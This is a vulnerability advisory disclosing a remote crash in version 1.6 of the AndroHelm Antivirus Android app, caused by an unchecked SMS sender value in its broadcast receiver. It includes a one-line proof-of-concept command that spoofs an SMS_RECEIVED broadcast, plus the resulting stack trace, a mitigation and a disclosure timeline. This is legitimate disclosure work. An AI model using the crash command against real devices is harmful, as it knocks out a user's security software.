SIK-2016-001


Title:

Remote Crash of AndroHelm Antivirus App

Report ID

SIK-2016-001

Summary:

  • Vendor: AndroHelm Antivirus
  • Product: Virenschutz für Android App (https://play.google.com/store/apps/details?id=com.androhelm.antivirus.free2)
  • Affected Version: 1.6, Platform Build Version Name 5.0.1-1624448
  • Severity: Low
  • Short summary:
    The application “AndroHelm Antivirus” by AndroHelm Antivirus contains different implementation flaws,
    which can be abused locally or remotely to crash the application.

Details:

The attack can be triggered remotely by sending spoofed SMS messages. The attack can also be initiated locally by emulating the sending of an SMS or the corresponding payload. The application crashes once the victim receives a non-numeric SMS message. Problem is the internal BroadcastReceiver that assumes to receive proper numeric sender-numbers of SMS messages.

See :

run app.broadcast.send --action android.provider.Telephony.SMS_RECEIVED --extra string test value

resulting in a NPE:

Java.lang.RuntimeException: Unable to start receiver
com.androhelm.antivirus.receivers.SMSMonitor: java.lang.NullPointerException
E/AndroidRuntime(16060): at
android.app.ActivityThread.handleReceiver(ActivityThread.java:2383)
E/AndroidRuntime(16060): at android.app.ActivityThread.access$1500(ActivityThread.java:141)
E/AndroidRuntime(16060): at
android.app.ActivityThread$H.handleMessage(ActivityThread.java:1310)
E/AndroidRuntime(16060): at android.os.Handler.dispatchMessage(Handler.java:99)
E/AndroidRuntime(16060): at android.os.Looper.loop(Looper.java:137)
E/AndroidRuntime(16060): at android.app.ActivityThread.main(ActivityThread.java:5041)
E/AndroidRuntime(16060): at java.lang.reflect.Method.invokeNative(Native Method)
E/AndroidRuntime(16060): at java.lang.reflect.Method.invoke(Method.java:511)
E/AndroidRuntime(16060): at
com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:793)
E/AndroidRuntime(16060): at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:560)
E/AndroidRuntime(16060): at dalvik.system.NativeStart.main(Native Method)
E/AndroidRuntime(16060): Caused by: java.lang.NullPointerException
E/AndroidRuntime(16060): at
com.androhelm.antivirus.receivers.SMSMonitor.onReceive(SMSMonitor.java:31)
E/AndroidRuntime(16060): at
android.app.ActivityThread.handleReceiver(ActivityThread.java:2376)
E/AndroidRuntime(16060): ... 10 more

Workaround

Suggested Mitigation

Verify the intent value against numeric SMS sender numbers in the onReceive(Context, Intent) method in Broadcast receivers.

Timeline

  • 2015-10-15 Vulnerability Discovered
  • 2015-10-26 Vulnerability Reported (1. Try, no reaction)
  • 2015-10-30 Vulnerability Reported (2. Try, no reaction)
  • 2015-11-05 Vulnerability Reported (3. Try, no reaction)
  • 2016-08-07 Fully disclosed